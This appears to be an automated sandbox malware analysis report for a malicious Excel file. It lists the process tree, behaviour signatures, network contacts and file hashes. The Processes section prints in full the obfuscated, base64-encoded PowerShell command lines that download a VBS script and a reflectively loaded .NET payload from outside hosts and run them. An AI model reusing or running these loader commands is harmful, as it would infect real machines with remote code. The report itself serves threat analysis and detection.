Malware Analysis Report

2024-12-07 16:59

Sample ID 241113-ctrpsavdkb
Target 4dc101b0b6fe54eb411577729f39253ad9a33cad9f0eca212ea4f3d786881ba4.xls
SHA256 4dc101b0b6fe54eb411577729f39253ad9a33cad9f0eca212ea4f3d786881ba4
Tags
defense_evasion discovery execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4dc101b0b6fe54eb411577729f39253ad9a33cad9f0eca212ea4f3d786881ba4

Threat Level: Known bad

The file 4dc101b0b6fe54eb411577729f39253ad9a33cad9f0eca212ea4f3d786881ba4.xls was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery execution

Process spawned unexpected child process

Evasion via Device Credential Deployment

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Drops file in System32 directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Uses Volume Shadow Copy service COM API

Uses Volume Shadow Copy WMI provider

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: AddClipboardFormatListener

Enumerates system info in registry

Modifies Internet Explorer settings

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 02:22

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 02:22

Reported

2024-11-13 02:24

Platform

win7-20240903-en

Max time kernel

141s

Max time network

142s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\4dc101b0b6fe54eb411577729f39253ad9a33cad9f0eca212ea4f3d786881ba4.xls

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\wiNDOWSpoWeRshell\V1.0\PoWeRsHELL.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\wiNDOWSpoWeRshell\V1.0\PoWeRsHELL.EXE N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wiNDOWSpoWeRshell\V1.0\PoWeRsHELL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wiNDOWSpoWeRshell\V1.0\PoWeRsHELL.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2732 wrote to memory of 2172 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNDOWSpoWeRshell\V1.0\PoWeRsHELL.EXE
PID 2732 wrote to memory of 2172 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNDOWSpoWeRshell\V1.0\PoWeRsHELL.EXE
PID 2732 wrote to memory of 2172 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNDOWSpoWeRshell\V1.0\PoWeRsHELL.EXE
PID 2732 wrote to memory of 2172 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNDOWSpoWeRshell\V1.0\PoWeRsHELL.EXE
PID 2172 wrote to memory of 1060 N/A C:\Windows\SysWOW64\wiNDOWSpoWeRshell\V1.0\PoWeRsHELL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2172 wrote to memory of 1060 N/A C:\Windows\SysWOW64\wiNDOWSpoWeRshell\V1.0\PoWeRsHELL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2172 wrote to memory of 1060 N/A C:\Windows\SysWOW64\wiNDOWSpoWeRshell\V1.0\PoWeRsHELL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2172 wrote to memory of 1060 N/A C:\Windows\SysWOW64\wiNDOWSpoWeRshell\V1.0\PoWeRsHELL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2172 wrote to memory of 1440 N/A C:\Windows\SysWOW64\wiNDOWSpoWeRshell\V1.0\PoWeRsHELL.EXE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2172 wrote to memory of 1440 N/A C:\Windows\SysWOW64\wiNDOWSpoWeRshell\V1.0\PoWeRsHELL.EXE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2172 wrote to memory of 1440 N/A C:\Windows\SysWOW64\wiNDOWSpoWeRshell\V1.0\PoWeRsHELL.EXE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2172 wrote to memory of 1440 N/A C:\Windows\SysWOW64\wiNDOWSpoWeRshell\V1.0\PoWeRsHELL.EXE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1440 wrote to memory of 2636 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1440 wrote to memory of 2636 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1440 wrote to memory of 2636 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1440 wrote to memory of 2636 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2172 wrote to memory of 2832 N/A C:\Windows\SysWOW64\wiNDOWSpoWeRshell\V1.0\PoWeRsHELL.EXE C:\Windows\SysWOW64\WScript.exe
PID 2172 wrote to memory of 2832 N/A C:\Windows\SysWOW64\wiNDOWSpoWeRshell\V1.0\PoWeRsHELL.EXE C:\Windows\SysWOW64\WScript.exe
PID 2172 wrote to memory of 2832 N/A C:\Windows\SysWOW64\wiNDOWSpoWeRshell\V1.0\PoWeRsHELL.EXE C:\Windows\SysWOW64\WScript.exe
PID 2172 wrote to memory of 2832 N/A C:\Windows\SysWOW64\wiNDOWSpoWeRshell\V1.0\PoWeRsHELL.EXE C:\Windows\SysWOW64\WScript.exe
PID 2832 wrote to memory of 2676 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2832 wrote to memory of 2676 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2832 wrote to memory of 2676 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2832 wrote to memory of 2676 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2676 wrote to memory of 3040 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2676 wrote to memory of 3040 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2676 wrote to memory of 3040 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2676 wrote to memory of 3040 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\4dc101b0b6fe54eb411577729f39253ad9a33cad9f0eca212ea4f3d786881ba4.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\wiNDOWSpoWeRshell\V1.0\PoWeRsHELL.EXE

"C:\Windows\SysTEm32\wiNDOWSpoWeRshell\V1.0\PoWeRsHELL.EXE" "PoWerSheLl.exE -EX bYPaSs -nOp -W 1 -C DeVIcecRedEnTIAldePLoYmeNT ; Iex($(iEX('[sYSTEm.teXt.EncOdInG]'+[Char]58+[CHar]58+'utf8.gEtSTRIng([sYsTeM.CoNVERt]'+[chAr]0X3a+[ChAR]0x3a+'fROmbaSe64StrInG('+[Char]0X22+'JHhPVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZEQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iZXJEZUZpTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFU1RuY2xIQkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUVlLeFpVVHBBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV4WnhmeGlKLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXVlpTdlp6Q2p4LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtFV09RcFNsZlRkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicnFDcFB6RkpybUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHhPVzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTkyLzU1L3NlZW1lYmVzdHRoaW5nc29udGhlcGFydG9md29ybGR3aGljaGdycndlYXRmb3IudElGIiwiJGVOVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc29udGhlcGFydG9md29ybGR3aGljaGdycncudmJTIiwwLDApO1NUQVJULVNMZWVQKDMpO1NUQXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NvbnRoZXBhcnRvZndvcmxkd2hpY2hncnJ3LnZiUyI='+[chAr]0X22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPaSs -nOp -W 1 -C DeVIcecRedEnTIAldePLoYmeNT

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qqu9i2ag.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF25B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF25A.tmp"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemebestthingsonthepartofworldwhichgrrw.vbS"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHZFcmJvc2VQckVGZXJFTkNFLlRvU1RSSW5nKClbMSwzXSsnWCctSm9pTicnKSgoKCdJY3BpbWFnZVVybCA9IE9BSWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2QnKyc5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgT0FJO0ljcHdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7SWNwaW1hZ2VCeXRlcyA9IEljcHdlYkNsaWVudCcrJy5Eb3dubG9hZERhdGEoSWNwaW1hZ2VVcmwpO0ljcGltYScrJ2dlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjguR2V0U3RyaW5nKEljcGltYWdlQnl0ZXMpO0ljcHN0YXJ0RmxhZyA9IE9BSTw8QkFTRTY0X1NUQVJUPj5PQUk7SWNwZW5kRmxhZyA9IE9BSTw8QkFTRTY0X0VORD4+T0FJO0ljcHN0YXJ0SW4nKydkZXggPSBJY3BpbWFnZVRleHQuSW5kZXhPZihJY3BzdGFydEZsYWcpO0ljcGVuZEluZGV4ID0gJysnSWNwaW1hZ2VUZXh0LkluZGV4T2YoSWNwZW5kRmxhZyknKyc7SWNwc3RhcnRJbmRleCAtZ2UgMCAtYW5kIEljcGVuZEluZGV4IC1ndCBJY3BzdGFydEluZGV4O0ljcHN0YXJ0SW5kZXggKz0gSWNwc3RhcnRGbGFnLkxlbicrJ2d0aDtJY3BiYXNlNjRMZW5ndGggPSBJY3BlbmRJbmRleCAtIEljcHN0YScrJ3J0SW4nKydkZXg7SWNwYmEnKydzZTY0Q29tbWFuZCA9IEljcGltYWdlVGV4dC5TdWJzdHJpbmcoSWNwc3RhcnRJbmRleCwgSWNwYmFzZTY0TGVuZ3RoKTtJY3BiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChJY3BiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMTR1IEZvckVhY2gtTycrJ2JqZWN0IHsgSWNwXyB9KVstMScrJy4uLShJY3BiYXNlNjRDb21tYW5kLkxlbicrJ2d0aCldO0ljcGNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoSWNwYmFzZTYnKyc0UmV2ZXJzZWQpO0ljcGxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChJY3AnKydjb21tYW5kQnl0ZXMpO0ljJysncHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoT0FJVkFJT0FJKTtJY3B2JysnYWlNZXRobycrJ2QuSW52b2tlKEljcG51bGwsIEAnKycoTycrJ0FJdHh0LkRFRERFV0VTLzU1LzI5MS44NzEuNjQuODkxLy86cHR0aE9BSSwnKycgT0FJZGUnKydzYXRpdmFkb09BSSwgT0FJZGVzYXRpdmEnKydkb09BSSwgT0FJZGVzYXRpdmFkb09BSSwgT0FJQ2EnKydzUG9sT0FJLCAnKydPQUlkZXNhdGl2YWRvT0FJLCBPQUlkZXNhdGl2YWRvT0FJLE9BSWRlc2F0aXZhZG9PQUksT0FJZGVzYXRpdmFkb09BSSxPQUlkZXNhdGl2YWRvT0FJLE9BSWRlc2F0aXZhZG9PQUksT0FJZGVzYXRpdmFkb09BSSxPQUkxT0FJLE9BSWRlc2F0aXZhZG9PQUkpKTsnKSAtUmVwTEFjRSAoW0NoYVJdNDkrW0NoYVJdNTIrW0NoYVJdMTE3KSxbQ2hhUl0xMjQgIC1jcmVwbEFDRSdPQUknLFtDaGFSXTM5IC1jcmVwbEFDRShbQ2hhUl03MytbQ2hhUl05OStbQ2hhUl0xMTIpLFtDaGFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $vErbosePrEFerENCE.ToSTRIng()[1,3]+'X'-JoiN'')((('IcpimageUrl = OAIhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd'+'9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f OAI;IcpwebClient = New-Object System.Net.WebClient;IcpimageBytes = IcpwebClient'+'.DownloadData(IcpimageUrl);Icpima'+'geText = [System.Text.Encoding]::UT'+'F8.GetString(IcpimageBytes);IcpstartFlag = OAI<<BASE64_START>>OAI;IcpendFlag = OAI<<BASE64_END>>OAI;IcpstartIn'+'dex = IcpimageText.IndexOf(IcpstartFlag);IcpendIndex = '+'IcpimageText.IndexOf(IcpendFlag)'+';IcpstartIndex -ge 0 -and IcpendIndex -gt IcpstartIndex;IcpstartIndex += IcpstartFlag.Len'+'gth;Icpbase64Length = IcpendIndex - Icpsta'+'rtIn'+'dex;Icpba'+'se64Command = IcpimageText.Substring(IcpstartIndex, Icpbase64Length);Icpbase64Reversed = -join (Icpbase64Command.ToCharArray() 14u ForEach-O'+'bject { Icp_ })[-1'+'..-(Icpbase64Command.Len'+'gth)];IcpcommandBytes = [Syst'+'em.Convert]::FromBase64String(Icpbase6'+'4Reversed);IcploadedAssembly = [System.Reflection.Assembly]::Load(Icp'+'commandBytes);Ic'+'pvaiMethod = [dnlib.IO.Home].GetMethod(OAIVAIOAI);Icpv'+'aiMetho'+'d.Invoke(Icpnull, @'+'(O'+'AItxt.DEDDEWES/55/291.871.64.891//:ptthOAI,'+' OAIde'+'sativadoOAI, OAIdesativa'+'doOAI, OAIdesativadoOAI, OAICa'+'sPolOAI, '+'OAIdesativadoOAI, OAIdesativadoOAI,OAIdesativadoOAI,OAIdesativadoOAI,OAIdesativadoOAI,OAIdesativadoOAI,OAIdesativadoOAI,OAI1OAI,OAIdesativadoOAI));') -RepLAcE ([ChaR]49+[ChaR]52+[ChaR]117),[ChaR]124 -creplACE'OAI',[ChaR]39 -creplACE([ChaR]73+[ChaR]99+[ChaR]112),[ChaR]36) )"

Network

Country Destination Domain Proto
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.82:80 r10.o.lencr.org tcp
US 198.46.178.192:80 198.46.178.192 tcp
KR 221.146.204.133:443 4t.gg tcp
US 198.46.178.192:80 198.46.178.192 tcp
US 198.46.178.192:80 198.46.178.192 tcp
US 8.8.8.8:53 1017.filemail.com udp
US 142.215.209.78:443 1017.filemail.com tcp
US 142.215.209.78:443 1017.filemail.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.18:80 crl.microsoft.com tcp

Files

memory/264-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/264-1-0x0000000072AAD000-0x0000000072AB8000-memory.dmp

memory/2732-16-0x0000000002760000-0x0000000002762000-memory.dmp

memory/264-17-0x00000000024F0000-0x00000000024F2000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CB467543952BE6B5200B9CADEB942CD1

MD5 fca2d4075e78fd8330d5590ee560451b
SHA1 b7ab976b0f45facd4a29a6aded52515523cd756b
SHA256 9f9f330b74a23eac5552db138565085b9a57c32dc746c3ad230659ad37ddc689
SHA512 f0adf4b6d64229f3c8dee585a80a7e8e1614251318be226bbf5af21779bf7ffac0d9f9858525e5388f00b9547984dae737d022d0cce4ba4c66936383bf55f991

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CB467543952BE6B5200B9CADEB942CD1

MD5 f0d5992490404da01be658fb9c891a1b
SHA1 06d4ec769c177a4cd9f66352efdcb741e341a3ce
SHA256 3ab6fc90aa8ccdb7117c9423c8c2728dc40266707c24a5f37a547768d97fed2e
SHA512 293007303740c76bb95770ac6d85695a86a904d788b4e7c79b1ed5d371d24bfa8421efe253381df4e387586d2ccb8d0f3bb0bccad3406a3df784d13f515ab3a7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 bb90146736d39a0674f3e9045d578df8
SHA1 ac9c90a1a8cbabba7b4a5b7cff03a4396f0d00a6
SHA256 bc4d9b7afcf555d02f18def261750c6053b75a972564e5ac3287e8d933da2aa1
SHA512 7053a1d3c142fe2274b6c7c22906cb5440196875931c9fb7166b4a07f9f7c448be996b9caa413a520c6240fe9d8ae2318ae471b52d6e0bc22d82cab4b4fa6010

C:\Users\Admin\AppData\Local\Temp\CabEA8E.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WCATT3E5\seemybesttimeforgivenmebestthingswithentiretimeforgivenmegreat[1].hta

MD5 2c5e1bbd5dc89095610f5ba7397189b1
SHA1 b1d36282dbe4cfcec1de5d18afc85dc41dee399a
SHA256 0b45ec52f8d182e2e8b0ab32856f06b9b58ccdb1012b7c9061f8afd1fe7cab87
SHA512 1f42fafc7b77a8862a22f818ff22e5e95cc4233326a9d0e469a98ce245b938e67675268f41233e1ee1167b418378994e209b6d381eee74b9e607ba1e34ec550c

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 c2af26044b8a0b1d2c1b632d2f5cd3de
SHA1 0c34b26fdc736c6683cb235f7fb6637a0dba2fad
SHA256 7f056250b3cf070e6c0c2ccbd33205b2f873006d85676167ac84123c7d6fd57a
SHA512 1e7a0426445cf10554d48e304447207bf35455202f9fc1d2a3f236438bd2d2f5b326ec73e8a83287dd4a58fae232920f7962d3b3e50818cf22e71851d65614d8

\??\c:\Users\Admin\AppData\Local\Temp\qqu9i2ag.cmdline

MD5 ef4f21a02bba9df2ac6c639873a05b7c
SHA1 67886120f0e0c009d12ba39c7aa384d71b0e3abc
SHA256 744581f7045824c8b6249cbc76a9b250f4cec4d80d2341570bdc9f1551abfa24
SHA512 c717a994dee89c7f5e3b6e63e3e93ee4b28f0a67b00b1e537a55b7c538fccb5e029ec2da686b36b2d798b3758ee73e716588f18d5f5d77a6a6bf4cb60d9a01fe

\??\c:\Users\Admin\AppData\Local\Temp\qqu9i2ag.0.cs

MD5 f8f40cf06d8b2ceb49d38fdf52e8ecc0
SHA1 1ff0676c6503f21f4899ba1cbc30351318403804
SHA256 39f96499c4e911bc620f0facad68dab4452781beb339326f5910c5caea5714a2
SHA512 020e05dd5bd89e587dfa492086e433ea0620fb58ead54c1325a527ba8d1bf7251faa66116b69b4a802e4f2994215de1b146fd2df6f9347470e280bf7a22a7857

\??\c:\Users\Admin\AppData\Local\Temp\CSCF25A.tmp

MD5 8a7fc637ef80e063d88435b12afc1d5b
SHA1 78bc9dba86aecd8147639f8784e764e1ec6655e0
SHA256 cc4cabfac94ebeccbdf74a162a8ecac6d1a77f5f9e18a888c3abd5210bde620c
SHA512 a4dcaacd47cf4c8f2f6f8fb56c6c33b1fd2742e05a51280b2543f4ab2683201d9da998c47761174d0abed161431dfab1ca6855dd97d6d746165b1ce2284f9dfa

C:\Users\Admin\AppData\Local\Temp\RESF25B.tmp

MD5 0c83f69c4c72dd0cf80b8f955c4c920d
SHA1 a3295b28cea16afa382a8620409f7f1cde97ec38
SHA256 b779e4693a1e81e9b955003d35c3e40aa0f935b0903ae1973281a9cd6ba0e666
SHA512 06c78c6c50d9500c01d18a912eed77562bede5e3ac5bce4871df63a5373dd8c6eedb0e6d7722cb6c66689e178ce6d3896a532edf9f725a4a1c483ef87cfa9431

C:\Users\Admin\AppData\Local\Temp\qqu9i2ag.dll

MD5 837cdaa739698a19b4997b833198e9a3
SHA1 4059b9ba87da9fecf977cbde86e56c7342518ed6
SHA256 eb8760b1916f3c4e1c295a6719b79f2d3da48dd52be4b0d09769c823b5b2f377
SHA512 77314ffefc4e1dc8e96450765998559d5d66dd8e89a9360eca93ba07d08212c94517b5340de944af6eddc9d73bcfee3c843e4050c5857098c2c2363c0ac74635

C:\Users\Admin\AppData\Local\Temp\qqu9i2ag.pdb

MD5 3eca96d920fda152288875646e40dc69
SHA1 73339f4e8cddbedb884fa767b0cdc6d085e938f2
SHA256 01a088fc8a23e5cb91d65efa88cadac1cb04db28a894fad0af296630f6b6058d
SHA512 83c29d78ac7d00a498d75282ad158469bdebdd1f25468b30021f9a415d8e2f9b8ee1664e051104d498022e8b16bfa523a3b1b0d74758837b3c3bdb97ba7de7ab

memory/264-60-0x0000000072AAD000-0x0000000072AB8000-memory.dmp

C:\Users\Admin\AppData\Roaming\seemebestthingsonthepartofworldwhichgrrw.vbS

MD5 1860dcae987d5ed903d93a6cfc698eaf
SHA1 aaee36eb86bd7c80fd0ae9328bea5650f8c74d12
SHA256 d72fec7ef303edc51d89e59e92743962f4f742d4678f4d01cafb1a110741efb3
